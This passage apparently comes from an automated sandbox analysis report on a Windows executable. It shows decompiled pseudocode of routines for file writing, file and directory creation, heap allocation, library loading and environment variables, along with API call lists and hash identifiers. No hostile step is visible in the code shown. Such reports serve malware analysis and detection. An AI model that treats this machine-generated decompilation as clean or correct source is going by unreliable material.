					E00405EC0(__eflags,  *((intOrPtr*)(__esp + 0x1c)), 0xa) = __esp + 0x14;
					__eax = E0040E500(__esp + 0x14, __esp + 0x14);
					_push( *((intOrPtr*)(__esp + 0xc)));
					__edx =  *((intOrPtr*)(__esp + 0x14));
					_pop(__ecx);
					__eax = E00405120(__ecx, __edx);
					if(__eflags == 0) {
						L1:
						_push(0);
						L3();
						E0040E4A0();
						HeapDestroy( *0x418068);
						ExitProcess(??);
						E00405373();
						E00409F70();
						E0040ACD5();
						E0040D8E4(E0040B0B0());
						return E0040A150();
					} else {
						__eax = E004097FE();
						__eax = __eax;
						__eflags = __eax;
						if(__eflags != 0) {
							__eax = E0040E4C0();
							__edx = __edx;
							__eax = E0040E4C0();
							__edx = __edx;
							__eax = E0040E6C0(__ecx);
							__edx =  *((intOrPtr*)(__esp + 0x18));
							__ecx = __eax;
							__ecx = E00405160(__ecx);
							__eax = E00405120(__eax, __edx);
							if(__eflags != 0) {
								 *0x4180b0 = 1;
								__eax = E0040E4C0();
								__edx = __edx;
								_push(__eax);
								__eax = E0040E4C0();
								__edx = __edx;
								__eax = 0x418080;
								_push(0x418080);
								__eax = E0040E500();
							}
						}
						__eax = E0040E590(__eax,  *((intOrPtr*)(__esp + 4)));
						__eax = E0040E590(__eax,  *((intOrPtr*)(__esp + 0xc)));
						__eax = E0040E590(__eax,  *((intOrPtr*)(__esp + 8)));
						__eax = E0040E590(__eax,  *((intOrPtr*)(__esp + 0x14)));
						__eax = E0040E590(__eax,  *((intOrPtr*)(__esp + 0x10)));
						__esp = __esp + 0x18;
						_pop(__ebp);
						return __eax;
					}
				}
			}














                                        0x00401ba0
                                        0x00401ba0
                                        0x00401ba4
                                        0x00401ba5
                                        0x00401ba6
                                        0x00401ba7
                                        0x00401ba8
                                        0x00401ba9
                                        0x00401baa
                                        0x00401bb0
                                        0x00401bb5
                                        0x00401bb6
                                        0x00401bb7
                                        0x00401bbc
                                        0x00401bc2
                                        0x00401bc7
                                        0x00401bc8
                                        0x00401bca
                                        0x00401bcf
                                        0x00401bd6
                                        0x00401bdb
                                        0x00401bde
                                        0x00401be8
                                        0x00401bfb
                                        0x00401c03
                                        0x00401c17
                                        0x00000000
                                        0x00401c1d
                                        0x00401c23
                                        0x00401c28
                                        0x00401c2e
                                        0x00401c33
                                        0x00401c33
                                        0x00401c35
                                        0x00000000
                                        0x00000000
                                        0x00401c37
                                        0x00401c3d
                                        0x00401c40
                                        0x00401c41
                                        0x00401c46
                                        0x00401c4e
                                        0x00401c53
                                        0x00401c5c
                                        0x00401c63
                                        0x00401c66
                                        0x00401c90
                                        0x00401c94
                                        0x00401c95
                                        0x00401c9a
                                        0x00401ca2
                                        0x00401ca7
                                        0x00401c68
                                        0x00401c68
                                        0x00401c6c
                                        0x00401c6d
                                        0x00401c72
                                        0x00401c75
                                        0x00401c7a
                                        0x00401c84
                                        0x00401c89
                                        0x00401c89
                                        0x00401cac
                                        0x00401cb1
                                        0x00401cb7
                                        0x00401cbd
                                        0x00401cc2
                                        0x00401cc3
                                        0x00401cc5
                                        0x00401cca
                                        0x00401ccb
                                        0x00401ccd
                                        0x00401cd2
                                        0x00401cd3
                                        0x00401cd5
                                        0x00401cda
                                        0x00401cdb
                                        0x00401cdc
                                        0x00401ce2
                                        0x00401ce7
                                        0x00401ce8
                                        0x00401cea
                                        0x00401cef
                                        0x00401cfa
                                        0x00401cff
                                        0x00401d07
                                        0x00401d0c
                                        0x00401d14
                                        0x00401d18
                                        0x00401d19
                                        0x00401d1e
                                        0x00401d22
                                        0x00401d23
                                        0x00401d28
                                        0x00401d30
                                        0x00401d35
                                        0x00401d3b
                                        0x00401d40
                                        0x00401d41
                                        0x00401d43
                                        0x00401d48
                                        0x00401d49
                                        0x00401d4b
                                        0x00401d50
                                        0x00401d51
                                        0x00401d53
                                        0x00401d58
                                        0x00401d68
                                        0x00401d6d
                                        0x00401d6d
                                        0x00401d75
                                        0x00401d79
                                        0x00401d7a
                                        0x00401d80
                                        0x00401d85
                                        0x00401d86
                                        0x00401d88
                                        0x00401d8d
                                        0x00401d9d
                                        0x00401da2
                                        0x00401da7
                                        0x00401dab
                                        0x00401daf
                                        0x00401db0
                                        0x00401db5
                                        0x004011b1
                                        0x004011b1
                                        0x004011b6
                                        0x004011bb
                                        0x004011c6
                                        0x004011cb
                                        0x004011d0
                                        0x004011d5
                                        0x004011da
                                        0x004011e4
                                        0x004011ee
                                        0x00401db7
                                        0x00401db7
                                        0x00401dbc
                                        0x00401dbc
                                        0x00401dbe
                                        0x00401dc1
                                        0x00401dc6
                                        0x00401dc9
                                        0x00401dce
                                        0x00401dda
                                        0x00401ddf
                                        0x00401de3
                                        0x00401dea
                                        0x00401dec
                                        0x00401df1
                                        0x00401df3
                                        0x00401dfe
                                        0x00401e03
                                        0x00401e04
                                        0x00401e06
                                        0x00401e0b
                                        0x00401e17
                                        0x00401e1d
                                        0x00401e1e
                                        0x00401e1e
                                        0x00401df1
                                        0x00401e37
                                        0x00401e40
                                        0x00401e49
                                        0x00401e52
                                        0x00401e5b
                                        0x00401e60
                                        0x00401e64
                                        0x00401e65
                                        0x00401e65
                                        0x00401db5

                                        APIs
                                          • Part of subcall function 0040E600: TlsGetValue.KERNEL32(0000001B,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417060), ref: 0040E617
                                          • Part of subcall function 0040E4C0: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E4C6
                                          • Part of subcall function 0040E4C0: TlsGetValue.KERNEL32(0000001B), ref: 0040E4D5
                                          • Part of subcall function 0040E4C0: SetLastError.KERNEL32(?), ref: 0040E4EB
                                          • Part of subcall function 00409638: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 00409654
                                          • Part of subcall function 00409638: wcscmp.MSVCRT ref: 00409662
                                          • Part of subcall function 00409638: memmove.MSVCRT ref: 0040967A
                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
                                        • EnumResourceTypesW.KERNEL32 ref: 00401BFB
                                        • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00401C03
                                          • Part of subcall function 0040E660: wcslen.MSVCRT ref: 0040E677
                                          • Part of subcall function 0040E500: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040E50C
                                          • Part of subcall function 0040E500: RtlAllocateHeap.NTDLL(022F0000,00000000,?), ref: 0040E539
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                                        • String ID:
                                        • API String ID: 983379767-0
                                        • Opcode ID: 08045bc97e147d00c96c2bcce4bbb6d806b276fac348019894c8ebf5dffd8ec5
                                        • Instruction ID: 5e74112abd147a8574eb6d35243810f6c0c070514dc1b130dc69c95b722a8064
                                        • Opcode Fuzzy Hash: 08045bc97e147d00c96c2bcce4bbb6d806b276fac348019894c8ebf5dffd8ec5
                                        • Instruction Fuzzy Hash: C25106B6514200BAE500BB739D86E7F666DDBC471CF10CD3FB444B60E2DA3C88616A6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B640, Relevance: 4.6, APIs: 3, Instructions: 102COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 66%
                                        			E0040B640(long __edx, void** _a4, void* _a8, long _a12) {
				long _v4;
				long _v8;
				long _v12;
				void* _t36;
				void* _t38;
				void* _t45;
				void* _t49;
				long _t58;
				void* _t63;
				long _t69;
				void** _t75;

				_t75 = _a4;
				_v12 = 0;
				if(_t75[7] != 0) {
					return 0;
				} else {
					if(_t75[5] == 1) {
						_t58 =  ~(_t75[3]);
						asm("cdq");
						_v8 = _t58;
						_v4 = __edx;
						SetFilePointer( *_t75, _t58,  &_v4, 1); // executed
						_t75[5] = 0;
						_t75[3] = _t75[2];
					}
					_t36 = _t75[3];
					_t69 = _a12;
					if(_t36 <= _t69) {
						E0040B060(_t75);
						_t38 = _t75[2];
						if(_t69 < _t38) {
							_push(_t69);
							_push(_a8);
							_t63 = _t75[1] - _t75[3] + _t38;
							goto L8;
						} else {
							WriteFile( *_t75, _a8, _t69,  &_v12, 0); // executed
							return _v12;
						}
					} else {
						_t63 = _t75[2] + _t75[1] - _t36;
						_t45 = _t69 - 1;
						if(_t45 == 0) {
							 *_t63 =  *_a8;
							_t75[3] = _t75[3] - _t69;
							return _t69;
						} else {
							_t49 = _t45 - 1;
							if(_t49 == 0) {
								 *_t63 =  *_a8;
								_t75[3] = _t75[3] - _t69;
								return _t69;
							} else {
								if(_t49 == 2) {
									 *_t63 =  *_a8;
									_t75[3] = _t75[3] - _t69;
									return _t69;
								} else {
									_push(_t69);
									_push(_a8);
									L8:
									memcpy(_t63, ??, ??);
									_t75[3] = _t75[3] - _t69;
									return _t69;
								}
							}
						}
					}
				}
			}














                                        0x0040b644
                                        0x0040b648
                                        0x0040b654
                                        0x0040b74d
                                        0x0040b65a
                                        0x0040b65e
                                        0x0040b669
                                        0x0040b66b
                                        0x0040b670
                                        0x0040b674
                                        0x0040b678
                                        0x0040b681
                                        0x0040b688
                                        0x0040b688
                                        0x0040b68b
                                        0x0040b68f
                                        0x0040b695
                                        0x0040b709
                                        0x0040b70e
                                        0x0040b713
                                        0x0040b73b
                                        0x0040b73c
                                        0x0040b740
                                        0x00000000
                                        0x0040b715
                                        0x0040b723
                                        0x0040b732
                                        0x0040b732
                                        0x0040b697
                                        0x0040b69d
                                        0x0040b6a1
                                        0x0040b6a2
                                        0x0040b6f9
                                        0x0040b6fd
                                        0x0040b705
                                        0x0040b6a4
                                        0x0040b6a4
                                        0x0040b6a5
                                        0x0040b6e3
                                        0x0040b6e8
                                        0x0040b6f0
                                        0x0040b6a7
                                        0x0040b6aa
                                        0x0040b6cd
                                        0x0040b6d1
                                        0x0040b6d9
                                        0x0040b6ac
                                        0x0040b6ac
                                        0x0040b6ad
                                        0x0040b6b1
                                        0x0040b6b2
                                        0x0040b6bc
                                        0x0040b6c4
                                        0x0040b6c4
                                        0x0040b6aa
                                        0x0040b6a5
                                        0x0040b6a2
                                        0x0040b695

                                        APIs
                                        • SetFilePointer.KERNELBASE(?,?,?,00000001), ref: 0040B678
                                        • memcpy.MSVCRT ref: 0040B6B2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: FilePointermemcpy
                                        • String ID:
                                        • API String ID: 1104741977-0
                                        • Opcode ID: 0352e650eba6ef7eda8f4acf3fbfa6c95f255572ee59791af127be4b65e015d3
                                        • Instruction ID: 6a71bfa5a709f607112e438838caa8d2890e2a5f5656acdf52857c7dfc968e31
                                        • Opcode Fuzzy Hash: 0352e650eba6ef7eda8f4acf3fbfa6c95f255572ee59791af127be4b65e015d3
                                        • Instruction Fuzzy Hash: 18314C392046019FC320DF29D844E5BB7E5EFD8714F04882EE59A97350D335E919CFAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B2F0, Relevance: 4.6, APIs: 3, Instructions: 76filememoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 96%
                                        			E0040B2F0(void* __ebx, void* _a4) {
				void* _t13;
				long _t16;
				long _t17;
				void* _t19;
				void* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;

				_t25 = _a4;
				_t23 = 0;
				_t24 = E0040DAB8( *0x418784, _t25);
				if(_t24 == 0) {
					return 0;
				} else {
					_t13 = CreateFileW( *(_t26 + 0x30), 0xc0000000, 0, 0, 2, 0x80, 0); // executed
					_t21 = _t13;
					if(_t21 != 0xffffffff) {
						L3:
						if(_t21 == 0) {
							goto L10;
						} else {
							_t16 =  *0x417120; // 0x1000
							if(_t16 == 0) {
								 *(_t24 + 4) = _t23;
							} else {
								 *(_t24 + 4) = RtlAllocateHeap( *0x418068, 0, _t16);
							}
							 *_t24 = _t21;
							_t17 =  *0x417120; // 0x1000
							 *(_t24 + 0xc) = _t23;
							 *(_t24 + 0x1c) = _t23;
							_t23 = _t24;
							 *(_t24 + 8) = _t17;
							 *((intOrPtr*)(_t24 + 0x14)) = 1;
							 *(_t24 + 0x18) = 2;
							if(_t25 != 0xffffffff) {
								_t23 = _t21;
							}
							if(_t23 == 0) {
								goto L10;
							}
						}
					} else {
						_t19 = CreateFileW( *(_t26 + 0x30), 0x40000000, 0, 0, 5, 0, 0); // executed
						_t21 = _t19;
						if(_t21 == 0xffffffff) {
							L10:
							if(_t25 != 0xffffffff) {
								_t24 = _t25;
							}
							_push(_t24);
							E0040DA2A( *0x418784);
						} else {
							goto L3;
						}
					}
					return _t23;
				}
			}












                                        0x0040b2f1
                                        0x0040b2fe
                                        0x0040b305
                                        0x0040b309
                                        0x0040b3bc
                                        0x0040b30f
                                        0x0040b323
                                        0x0040b329
                                        0x0040b32e
                                        0x0040b34c
                                        0x0040b34e
                                        0x00000000
                                        0x0040b350
                                        0x0040b350
                                        0x0040b357
                                        0x0040b36d
                                        0x0040b359
                                        0x0040b368
                                        0x0040b368
                                        0x0040b370
                                        0x0040b372
                                        0x0040b377
                                        0x0040b37a
                                        0x0040b37d
                                        0x0040b37f
                                        0x0040b382
                                        0x0040b389
                                        0x0040b393
                                        0x0040b395
                                        0x0040b395
                                        0x0040b399
                                        0x00000000
                                        0x00000000
                                        0x0040b399
                                        0x0040b330
                                        0x0040b33f
                                        0x0040b345
                                        0x0040b34a
                                        0x0040b39b
                                        0x0040b39e
                                        0x0040b3a0
                                        0x0040b3a0
                                        0x0040b3a2
                                        0x0040b3a9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040b34a
                                        0x0040b3b4
                                        0x0040b3b4

                                        APIs
                                          • Part of subcall function 0040DAB8: RtlEnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B3F5,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DAC3
                                          • Part of subcall function 0040DAB8: RtlLeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B3F5,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB3E
                                        • CreateFileW.KERNELBASE(00000001,C0000000,00000000,00000000,00000002,00000080,00000000,00000001,00000000,?,?,?,004047DD,FFFFFFFF,?,00000000), ref: 0040B323
                                        • CreateFileW.KERNELBASE(00000001,40000000,00000000,00000000,00000005,00000000,00000000,?,?,?,004047DD,FFFFFFFF,?,00000000,00000000,00000000), ref: 0040B33F
                                        • RtlAllocateHeap.KERNEL32(00000000,00001000,?,?,?,004047DD,FFFFFFFF,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00403ED1), ref: 0040B362
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CreateCriticalFileSection$AllocateEnterHeapLeave
                                        • String ID:
                                        • API String ID: 3953544306-0
                                        • Opcode ID: ba3c0e3671179c576f1e8063d1175cd95182cec47413371e43854c61cb85fc68
                                        • Instruction ID: ffa4d8016f0c3054d01dfc4e370d69acd56ef11dab29562e94bcb7c5ac8cf68f
                                        • Opcode Fuzzy Hash: ba3c0e3671179c576f1e8063d1175cd95182cec47413371e43854c61cb85fc68
                                        • Instruction Fuzzy Hash: B5216F31240704ABC2305F1A9C48F57BAA9EBC5724F24863EF965A26E1D77598058BA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E500, Relevance: 4.6, APIs: 3, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040E500(void** _a4, intOrPtr _a8) {
				unsigned int _v8;
				intOrPtr* _v12;
				long _t19;
				void* _t23;
				void* _t26;
				void* _t27;
				void* _t41;
				void* _t46;

				_t19 =  *0x417168; // 0x1b
				_v12 = TlsGetValue(_t19);
				_v8 =  *((intOrPtr*)(_v12 + 8)) - _a8;
				if( *_a4 != 0) {
					_t41 =  *0x418788; // 0x22f0000
					_t23 = RtlReAllocateHeap(_t41, 0,  *_a4, _v8 + 0xa); // executed
					 *_a4 = _t23;
				} else {
					_t46 =  *0x418788; // 0x22f0000
					_t27 = RtlAllocateHeap(_t46, 0, _v8 + 0xa); // executed
					 *_a4 = _t27;
				}
				_t26 = E0040E9A0( *_v12 + _a8,  *_a4,  *_v12 + _a8, _v8 >> 1);
				 *((intOrPtr*)(_v12 + 8)) = _a8;
				return _t26;
			}











                                        0x0040e506
                                        0x0040e512
                                        0x0040e51e
                                        0x0040e527
                                        0x0040e555
                                        0x0040e55c
                                        0x0040e565
                                        0x0040e529
                                        0x0040e532
                                        0x0040e539
                                        0x0040e542
                                        0x0040e542
                                        0x0040e57c
                                        0x0040e587
                                        0x0040e58d

                                        APIs
                                        • TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040E50C
                                        • RtlAllocateHeap.NTDLL(022F0000,00000000,?), ref: 0040E539
                                        • RtlReAllocateHeap.NTDLL(022F0000,00000000,?,?), ref: 0040E55C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AllocateHeap$Value
                                        • String ID:
                                        • API String ID: 2497967046-0
                                        • Opcode ID: df660188f746c0786e6c7e6d79ed505234a79b8fdb16a0aa5610c99c65d51f33
                                        • Instruction ID: ec644bf1e310fa11f975415b9a01df95793a1d0af80ed12fcbe607553cd682c7
                                        • Opcode Fuzzy Hash: df660188f746c0786e6c7e6d79ed505234a79b8fdb16a0aa5610c99c65d51f33
                                        • Instruction Fuzzy Hash: 0A11E974600208FFCB04CF98D894E9ABBB6FF89314F20C569E8099B354D734AA41CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040ACE5, Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040ACE5(wchar_t* _a4) {
				short _v8;
				short _v528;
				WCHAR* _t18;
				int _t20;
				signed int _t23;

				if(_a4 == 0) {
					return 0;
				}
				wcsncpy( &_v528, _a4, 0x104);
				_v8 = 0;
				_t18 =  &(( &_v528)[wcslen( &_v528)]);
				while(_t18 >  &_v528) {
					_t23 =  *(_t18 - 2) & 0x0000ffff;
					if(_t23 == 0x20 || _t23 == 0x5c || _t23 == 0x2f) {
						_t18 =  &(_t18[0xffffffffffffffff]);
						continue;
					} else {
						break;
					}
				}
				 *_t18 = 0;
				_t20 = CreateDirectoryW( &_v528, 0); // executed
				return _t20;
			}








                                        0x0040acf2
                                        0x00000000
                                        0x0040ad5d
                                        0x0040ad03
                                        0x0040ad0a
                                        0x0040ad23
                                        0x0040ad3e
                                        0x0040ad28
                                        0x0040ad2f
                                        0x0040ad3b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040ad2f
                                        0x0040ad4a
                                        0x0040ad55
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CreateDirectorywcslenwcsncpy
                                        • String ID:
                                        • API String ID: 961886536-0
                                        • Opcode ID: 09e41ba929aefffd52cd3ad4d6bca4e07924ddf6320418c0728f46b3160271d0
                                        • Instruction ID: bd379630e1a5de22d975f38df871fd71f7e83de70bb77916b4cf567eca7d8e55
                                        • Opcode Fuzzy Hash: 09e41ba929aefffd52cd3ad4d6bca4e07924ddf6320418c0728f46b3160271d0
                                        • Instruction Fuzzy Hash: FD012BB140130897CB24DB64CC89ABE7379DF00301F2046BBE415E65D1E7389AA4DB5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B750, Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040B750(int _a4, short* _a8, int* _a12) {
				short* _v0;
				int _v4;
				int _t6;
				char* _t9;
				int* _t11;
				char* _t13;

				_t6 = WideCharToMultiByte(_a4, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t11 = _a12;
				 *_t11 = _t6;
				if(_t6 == 0) {
					return 0;
				} else {
					_t9 = RtlAllocateHeap( *0x418068, 0, _t6 + 1); // executed
					_t13 = _t9;
					if(_t13 != 0) {
						WideCharToMultiByte(_v4, 0, _v0, 0xffffffff, _t13,  *_t11, 0, 0);
						 *_t11 =  *_t11 - 1;
						_t9 = _t13;
					}
					return _t9;
				}
			}









                                        0x0040b765
                                        0x0040b76b
                                        0x0040b76f
                                        0x0040b773
                                        0x0040b7b1
                                        0x0040b775
                                        0x0040b780
                                        0x0040b786
                                        0x0040b78a
                                        0x0040b79f
                                        0x0040b7a5
                                        0x0040b7a7
                                        0x0040b7a7
                                        0x0040b7ab
                                        0x0040b7ab

                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,0040B547,-00000001,00000000,00000000,?,?,0040B5C0), ref: 0040B765
                                        • RtlAllocateHeap.NTDLL(00000000,00000001,?,?,0040B547,-00000001,00000000,00000000,?,?,0040B5C0,00000000,00000000,?,00000000,00402403), ref: 0040B780
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,0040B547,-00000001,00000000,00000000), ref: 0040B79F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeap
                                        • String ID:
                                        • API String ID: 2584219951-0
                                        • Opcode ID: e7be91b2b2668f61a3771e3bb43458c76dbb102b5d4d7d907eb1da25d0077e23
                                        • Instruction ID: b6b8b0ffc0634d7e03913f007dc65fac65270f489758efa64f1431cc90b61ae5
                                        • Opcode Fuzzy Hash: e7be91b2b2668f61a3771e3bb43458c76dbb102b5d4d7d907eb1da25d0077e23
                                        • Instruction Fuzzy Hash: 23F01D36349312BFE7210B14ED05F5ABBB1EB88B60F304635B654B52F4C771E8209B98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00408D8E, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E00408D8E(void* __ecx) {
				intOrPtr _v8;
				void _v12;
				void* _t9;

				memset( &_v12, 0, 8);
				_v12 = 8;
				_v8 = 0xb48;
				 *0x417668( &_v12, __ecx, __ecx);
				_t9 =  *0x417688(0); // executed
				return _t9;
			}






                                        0x00408d9b
                                        0x00408da3
                                        0x00408dad
                                        0x00408db5
                                        0x00408dbd
                                        0x00408dc6

                                        APIs
                                        • memset.MSVCRT ref: 00408D9B
                                        • 6FC38420.COMCTL32(00000008,00001000), ref: 00408DB5
                                        • CoInitialize.OLE32(00000000), ref: 00408DBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: C38420Initializememset
                                        • String ID:
                                        • API String ID: 3257538022-0
                                        • Opcode ID: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                                        • Instruction ID: 955719fea0046c6293a44e32614ed026eb147d3324017d94785fb64326744d49
                                        • Opcode Fuzzy Hash: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                                        • Instruction Fuzzy Hash: FDE08CB088430CBBEB009BD0EC0EF8DBB7CEB00315F4041A4F904A2280EBB466488B95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409945, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00409945(WCHAR* _a4, WCHAR* _a8) {
				void* _t4;
				WCHAR* _t5;
				int _t6;

				if(_a4 != 0) {
					_t5 = _a8;
					if(_t5 == 0) {
						_t5 = 0x413024;
					}
					_t6 = SetEnvironmentVariableW(_a4, _t5); // executed
					return _t6;
				}
				return _t4;
			}






                                        0x0040994a
                                        0x0040994c
                                        0x00409952
                                        0x00409954
                                        0x00409954
                                        0x0040995e
                                        0x00000000
                                        0x0040995e
                                        0x00409964

                                        APIs
                                        • SetEnvironmentVariableW.KERNELBASE(022F97F8,022F97F8,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040995E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: EnvironmentVariable
                                        • String ID: $0A
                                        • API String ID: 1431749950-513306843
                                        • Opcode ID: c92aad9fdd5c3c8ab1daeb637eb2d23f1451a042da96c25929af1641449dc86f
                                        • Instruction ID: 9398af478b47f93275832725cf2a6d50d705997c04a2bf8a96333744faa435c7
                                        • Opcode Fuzzy Hash: c92aad9fdd5c3c8ab1daeb637eb2d23f1451a042da96c25929af1641449dc86f
                                        • Instruction Fuzzy Hash: 9CC01270104202EBD710DA14C804B67BBE4EB50745F00C43EB084A1370C334CC40DB05
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040B3E0, Relevance: 3.1, APIs: 2, Instructions: 65memoryfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
